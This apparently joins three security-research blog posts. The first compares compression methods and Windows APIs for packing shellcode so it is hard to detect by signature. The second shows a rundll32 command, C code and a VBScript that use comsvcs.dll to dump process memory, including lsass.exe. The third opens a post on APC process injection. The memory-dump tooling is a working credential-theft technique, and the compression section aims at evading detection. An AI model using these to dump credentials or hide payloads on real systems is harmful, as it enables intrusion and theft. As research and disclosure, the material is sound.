Shellcode: Data Compression

Introduction

This post examines data compression algorithms suitable for position-independent code and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

For shellcode, algorithms based on the following conditions are considered:

  1. Compact decompressor.
  2. Good compression ratio.
  3. Portable across operating systems and architectures.
  4. Difficult to detect by signature.
  5. Unencumbered by patents and licensing.

Meeting all of these requirements isn’t easy. Search for “lightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. That’s not an issue on machines with 1TB hard drives, of course, but it is a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed and contain arrays and constants that allow them to be easily identified with signature-based tools.

Algorithms that are compact might have suboptimal compression ratios, or the compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then at which Windows API can be used as an alternative. There are also open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

Table of contents

  1. Executable Compression
  2. Windows NT Layer DLL
  3. Windows Compression API
  4. Windows Packaging API
  5. Windows Imaging API
  6. Direct3D HLSL Compiler
  7. Windows-internal libarchive library
  8. LibreSSL Cryptography Library
  9. Windows.Storage.Compression
  10. Windows Undocumented API
  11. Summary

1. Executable Compression

The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

  • Redemption, by Jacky Qwerty/29A
  • Inca, Hybris, by Vecna/29A
  • Aldebaran, by Bozo/iKX
  • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
  • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
  • Junkmail, Junkhtmail, by roy g biv/29A/defjam

The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

BCE, which appeared in 29A#4, was disappointing with only an 8% compression ratio. BNCE, which appeared in DCA#1, was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With the exception of the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.
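To give a feel for why a zero-only scheme can get away with such a tiny decompressor, here is a minimal sketch of zero-run encoding in C. The format (a 0x00 marker followed by a one-byte run length) and the names zrle_pack and zrle_unpack are assumptions made for illustration. This is not LSCE's actual encoding.

```c
#include <stddef.h>
#include <stdint.h>

// Hypothetical format: a zero byte is followed by a count (1-255) of how
// many zeros it stands for; every other byte is copied verbatim.
// Returns the packed size, or 0 if the output buffer is too small
// (an empty input also yields 0).
size_t zrle_pack(const uint8_t *in, size_t inlen, uint8_t *out, size_t outmax) {
    size_t i = 0, o = 0;
    while (i < inlen) {
        if (in[i] == 0) {
            // count a run of zeros, capped at 255 per marker
            size_t run = 0;
            while (i < inlen && in[i] == 0 && run < 255) { i++; run++; }
            if (o + 2 > outmax) return 0;
            out[o++] = 0;
            out[o++] = (uint8_t)run;
        } else {
            if (o + 1 > outmax) return 0;
            out[o++] = in[i++];
        }
    }
    return o;
}

// Returns the unpacked size, or 0 on malformed input or overflow.
size_t zrle_unpack(const uint8_t *in, size_t inlen, uint8_t *out, size_t outmax) {
    size_t i = 0, o = 0;
    while (i < inlen) {
        uint8_t b = in[i++];
        if (b != 0) {
            if (o + 1 > outmax) return 0;
            out[o++] = b;
        } else {
            // a marker must be followed by a non-zero run length
            if (i >= inlen) return 0;
            size_t run = in[i++];
            if (run == 0 || o + run > outmax) return 0;
            while (run--) out[o++] = 0;
        }
    }
    return o;
}
```

The unpack loop is only a handful of instructions, which is the appeal. The cost is that anything other than zero padding passes through uncompressed.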

While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004 (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

Figure 1: Shellcode constructor by Z0MBiE/29A

UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides a good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

2. Windows NT Layer DLL

Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

  • Compression

Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the workspace and for the compressed data, then pass both buffers and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
    ULONG                            wspace, fspace;
    ULONG                            outlen = 0; // RtlCompressBuffer stores a 32-bit size
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlCompressBuffer_t              RtlCompressBuffer;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output 
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // 4. compress data
          nts = RtlCompressBuffer(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            inbuf, inlen, outbuf, inlen, 0, 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write the original length
            WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
            // 6. write compressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          }
          // 7. free output buffer
          free(outbuf);
        }
        // 8. free workspace
        free(ws);
      }
    }
    return outlen;
}
  • Decompression

LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer. Xpress Huffman data, however, can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2, both of which require a WorkSpace buffer.

    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
      USHORT                 CompressionFormatAndEngine,
      PUCHAR                 UncompressedBuffer,
      ULONG                  UncompressedBufferSize,
      PUCHAR                 CompressedBuffer,
      ULONG                  CompressedBufferSize,
      PULONG                 FinalUncompressedSize,
      PVOID                  WorkSpace);
      
DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    ULONG                            wspace, fspace;
    SIZE_T                           outlen = 0;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlDecompressBufferEx_t          RtlDecompressBufferEx;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output
        outlen = *(DWORD*)inbuf;
        outbuf = malloc(outlen);
        
        if(outbuf != NULL) {
          // 4. decompress data
          nts = RtlDecompressBufferEx(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            outbuf, outlen, 
            (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write decompressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          } else {
            printf("RtlDecompressBufferEx failed with %08lx\n", nts);
          }
          // 6. free output buffer
          free(outbuf);
        } else {
          printf("malloc() failed\n");
        }
        // 7. free workspace
        free(ws);
      }
    }
    return outlen;
}
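Both routines above prefix the compressed data with the original length as a raw DWORD, and the decompressor reads it back without first checking that the input is long enough. A small sketch of explicit little-endian framing with a length check follows. The names hdr_put, hdr_get and HDR_SIZE are hypothetical and not part of rtlcompress.c.

```c
#include <stddef.h>
#include <stdint.h>

#define HDR_SIZE 4  // bytes used to store the original (uncompressed) length

// Store the original length as 4 little-endian bytes at the start of buf.
void hdr_put(uint8_t *buf, uint32_t orig_len) {
    buf[0] = (uint8_t)(orig_len);
    buf[1] = (uint8_t)(orig_len >> 8);
    buf[2] = (uint8_t)(orig_len >> 16);
    buf[3] = (uint8_t)(orig_len >> 24);
}

// Read the header back and locate the payload that follows it.
// Returns 0 if the blob is too short to hold a header plus at least
// one byte of payload, 1 otherwise.
int hdr_get(const uint8_t *blob, size_t blob_len,
            uint32_t *orig_len, const uint8_t **payload, size_t *payload_len) {
    if (blob_len <= HDR_SIZE) return 0;
    *orig_len = (uint32_t)blob[0] | ((uint32_t)blob[1] << 8) |
                ((uint32_t)blob[2] << 16) | ((uint32_t)blob[3] << 24);
    *payload = blob + HDR_SIZE;
    *payload_len = blob_len - HDR_SIZE;
    return 1;
}
```

The payload pointer and length returned by hdr_get correspond to the compressed buffer and size passed to RtlDecompressBufferEx, and orig_len is the size to allocate for the output.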

3. Windows Compression API

Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. See xpress.c for a demonstration of using them.

Compression

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    COMPRESSOR_HANDLE ch = NULL;
    BOOL              r;
    SIZE_T            outlen, len;
    LPVOID            outbuf;
    DWORD             wr;
    
    // Create a compressor
    r = CreateCompressor(engine, NULL, &ch);
    
    if(r) {    
      // Query compressed buffer size.
      Compress(ch, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for compressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
          // if compressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Compress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Compress()");
      CloseCompressor(ch);
    } else xstrerror("CreateCompressor()");
    return r;
}

Decompression

DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    DECOMPRESSOR_HANDLE dh = NULL;
    BOOL                r;
    SIZE_T              outlen, len;
    LPVOID              outbuf;
    DWORD               wr;
    
    // Create a decompressor
    r = CreateDecompressor(engine, NULL, &dh);
    
    if(r) {    
      // Query Decompressed buffer size.
      Decompress(dh, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for decompressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Decompress data and write data to outbuf.
          r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
          // if decompressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Decompress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Decompress()");
      CloseDecompressor(dh);
    } else xstrerror("CreateDecompressor()");
    return r;
}

4. Windows Packaging API

If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

5. Windows Imaging API (WIM)

These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive that’s then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these API.

For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

6. Direct3D HLSL Compiler

Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

Compression

#pragma comment(lib, "D3DCompiler.lib")
#include <d3dcompiler.h>
uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
    
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // compress data
    hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;
}

Decompression

uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    // create file to save decompressed data to
    file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // decompress buffer
    hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;    
}

The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is “D3DCompiler_47.dll”. It will likely be different on legacy systems.
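One way to cope with the versioned file name is to probe candidates from newest to oldest. The sketch below is only an illustration: d3dcompiler_name and load_d3dcompiler are hypothetical helpers, and the range of version numbers to try is an assumption you would need to adjust for the systems you target.

```c
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#endif

// Format "D3DCompiler_<version>.dll" into out. Returns the length
// written, or -1 if the buffer is too small.
int d3dcompiler_name(char *out, size_t outmax, int version) {
    int n = snprintf(out, outmax, "D3DCompiler_%d.dll", version);
    return (n < 0 || (size_t)n >= outmax) ? -1 : n;
}

#ifdef _WIN32
// Walk version numbers from newest to oldest and return the first module
// that loads and exports D3DCompressShaders, or NULL if none does.
HMODULE load_d3dcompiler(int newest, int oldest) {
    char name[32];
    for (int v = newest; v >= oldest; v--) {
        if (d3dcompiler_name(name, sizeof(name), v) < 0) continue;
        HMODULE m = LoadLibraryA(name);
        if (m == NULL) continue;
        if (GetProcAddress(m, "D3DCompressShaders") != NULL) return m;
        FreeLibrary(m);  // loaded, but the export is missing
    }
    return NULL;
}
#endif
```

Checking for the export rather than just the file means a version that lacks D3DCompressShaders is skipped instead of failing later.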

7. Windows-internal libarchive library

Since the release of Windows 10 build 17063, the tape archiving tool ‘bsdtar’ has been available. It uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on Windows supports the bzip2, compress and gzip formats. Although bsdtar lists support for xz, lzma and lzip, they appear to be unsupported, at least on my system.

8. LibreSSL Cryptography Library

Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

9. Windows.Storage.Compression

This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

10. Windows Undocumented API

DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, on at least Windows 7 through 10 there is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly enough.) Four public symbols grabbed my attention: ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c

Compression

The following code uses zlib.h to compress a buffer and write to file.

DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_deflate_t      ums_deflate;
    ums_deflate_init_t ums_deflate_init;
    int                err;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
    ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
    
    if(ums_deflate_init == NULL || ums_deflate == NULL) {
      printf("  [ unable to resolve deflate API.\n");
      return 0;
    }
    // allocate memory for compressed data
    outbuf = malloc(inlen);
    if(outbuf != NULL) {
      // Compress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen;       // size of input
      ds.next_in   = (Bytef *)inbuf;    // input buffer
      ds.avail_out = (uInt)inlen;       // size of output buffer
      ds.next_out  = (Bytef *)outbuf;   // output buffer
      
      if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
        if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
          // write the original length first
          WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
          // then the data
          // total_out is the number of bytes produced;
          // avail_out is only the space left in outbuf
          WriteFile(outfile, outbuf, ds.total_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_deflate() : %x\n", err);
        }
      } else {
        printf("  [ ums_deflate_init()\n");
      }
      free(outbuf);
    }
    return 0;
}

Decompression

Inflating/decompressing the data is based on an example using zlib.

DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_inflate_t      ums_inflate;
    ums_inflate_init_t ums_inflate_init;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
    ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
    
    if(ums_inflate_init == NULL || ums_inflate == NULL) {
      printf("  [ unable to resolve inflate API.\n");
      return 0;
    }
    // allocate memory for decompressed data
    outlen = *(DWORD*)inbuf;
    outbuf = malloc(outlen*2);
    
    if(outbuf != NULL) {
      // decompress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen - 4;       // size of input, minus the 4-byte length
      ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
      ds.avail_out = (uInt)outlen*2;        // size of output buffer
      ds.next_out  = (Bytef*)outbuf;        // output buffer
      
      printf("  [ initializing inflate...\n");
      if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
        printf("  [ inflating...\n");
        if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
          // total_out is the number of bytes inflated
          WriteFile(outfile, outbuf, ds.total_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_inflate()\n");
        }
      } else {
        printf("  [ ums_inflate_init()\n");
      }
      free(outbuf);
    } else {
      printf("  [ malloc()\n");
    }
    return 0;
}

11. Summary/Results

That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option, but they are also susceptible to monitoring and may not be portable. One area I didn’t cover due to time is the Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

Library / API        Algorithm / Engine   Compression Ratio
RtlCompressBuffer    LZNT1                39%
RtlCompressBuffer    Xpress               47%
RtlCompressBuffer    Xpress Huffman       53%
Compress             MSZIP                55%
Compress             Xpress               40%
Compress             Xpress Huffman       48%
Compress             LZMS                 58%
D3DCompressShaders   DXT/BC               60%
aPLib                N/A                  45%
UCL                  N/A                  42%
Undocumented API     DEFLATE              46%
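The post doesn't spell out how the percentages were calculated. Since higher numbers are treated as better throughout, they read as space saved relative to the original size, and that interpretation is assumed in the sketch below. The name space_saved_pct is hypothetical.

```c
#include <stddef.h>

// Space saved as a percentage of the original size:
//   100 * (1 - compressed / original)
// Returns 0 for an empty input to avoid dividing by zero.
double space_saved_pct(size_t original, size_t compressed) {
    if (original == 0) return 0.0;
    return 100.0 * (1.0 - (double)compressed / (double)original);
}
```

Under that assumption, a 1MB (1,048,576 byte) file that packs down to roughly 419,430 bytes scores about 60%.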

MiniDumpWriteDump via COM+ Services DLL

Introduction

This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn’t find it before is because I was searching for “MiniDumpW” and not “MiniDump”.

While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and the third requires the keyword “full” even though there’s no alternative for this last parameter.

To use from the command line, type the following: rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full" where “1234” is the id of the target process to dump. Obviously, this assumes you have permission to query and read the memory of the target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won’t see anything. The following code in C demonstrates how to invoke it dynamically.

BTW, HRESULT is probably the wrong return type. Internally it exits the process with E_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

#define UNICODE
#include <windows.h>
#include <stdio.h>

typedef HRESULT (WINAPI *_MiniDumpW)(
  DWORD arg1, DWORD arg2, PWCHAR cmdline);
  
typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
  ULONG Privilege, BOOL Enable, 
  BOOL CurrentThread, PULONG Enabled);

// "<pid> <dump.bin> full"
int wmain(int argc, wchar_t *argv[]) {
    HRESULT             hr;
    _MiniDumpW          MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG               t;
    
    MiniDumpW          = (_MiniDumpW)GetProcAddress(
      LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
      
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
      GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    
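    // argv[1] must hold the "<pid> <dump.bin> full" string
    if(argc != 2) {
      printf("Usage: %ws \"<pid> <dump.bin> full\"\n", argv[0]);
      return 0;
    }
    
    if(MiniDumpW == NULL) {
      printf("Unable to resolve COMSVCS!MiniDumpW.\n");
      return 0;
    }
    // try enable debug privilege (SeDebugPrivilege is 20)
    if(RtlAdjustPrivilege != NULL) {
      RtlAdjustPrivilege(20, TRUE, FALSE, &t);
    }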
        
    printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
   
    // dump process
    MiniDumpW(0, 0,  argv[1]);
    printf("OK!\n");
    
    return 0;
}
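The single argument string that MiniDumpW expects can be assembled with swprintf rather than typed by hand. This is a sketch only: minidump_args is a hypothetical helper name, and the "<pid> <path> full" layout is taken from the description above. How paths containing spaces are handled isn't covered here.

```c
#include <stddef.h>
#include <wchar.h>

// Build the wide argument string "<pid> <path> full".
// Returns the number of characters written (excluding the terminator),
// or -1 if out is too small.
int minidump_args(wchar_t *out, size_t outmax,
                  unsigned long pid, const wchar_t *path) {
    int n = swprintf(out, outmax, L"%lu %ls full", pid, path);
    return (n < 0) ? -1 : n;
}
```

The resulting buffer can be passed as the third parameter in place of argv[1].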

Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBScript will work in an elevated process.

Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
    WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
    WScript.StdOut.WriteLine("Usage: procdump <process>")
    WScript.Quit
Else
    Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
    
    ' get process id or name
    pid = WScript.Arguments(0)
    
    ' connect with debug privilege
    Set fso  = CreateObject("Scripting.FileSystemObject")
    Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
    
    ' if not a number
    If(Not IsNumeric(pid)) Then
      query = "Name"
    Else
      query = "ProcessId"
    End If
    
    ' try find it
    Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
      query & " = '" & pid & "'")
    
    If (list.Count = 0) Then
      WScript.StdOut.WriteLine("Can't find active process : " & pid)
      WScript.Quit()
    End If

    For Each proc in list
      pid = proc.ProcessId
      str = proc.Name
      Exit For
    Next

    dmp = fso.GetBaseName(str) & ".bin"
    
    ' if dump file already exists, try to remove it
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Removing " & dmp)
      fso.DeleteFile(dmp)
    End If
    
    WScript.StdOut.WriteLine("Attempting to dump memory from " & _
      str & ":" & pid & " to " & dmp)
    
    Set proc       = svc.Get("Win32_Process")
    Set startup    = svc.Get("Win32_ProcessStartup")
    Set cfg        = startup.SpawnInstance_
    cfg.ShowWindow = SW_HIDE

    cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
          pid & " " & fso.GetAbsolutePathName(".") & "\" & _
          dmp & " full"
    
    Call proc.Create (cmd, null, cfg, pid)
    
    ' sleep for a second
    Wscript.Sleep(1000)
    
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Memory saved to " & dmp)
    Else
      WScript.StdOut.WriteLine("Something went wrong.")
    End If
End If

Run it from an elevated command prompt.

No idea how useful this could be, but since it’s part of the operating system, it’s probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process. 🙂


Windows Process Injection: Asynchronous Procedure Call (APC)

Introduction

An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked “how to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

Alertable Threads

A number of Windows API and the underlying system calls support asynchronous operations, specifically I/O completion routines. A boolean parameter tells the kernel that the calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 API can set threads to alertable.

  • SleepEx
  • WaitForSingleObjectEx
  • WaitForMultipleObjectsEx
  • SignalObjectAndWait
  • MsgWaitForMultipleObjectsEx

A few others, rarely mentioned, involve working with files or named pipes that might be read or written to using overlapped operations, e.g. ReadFile.

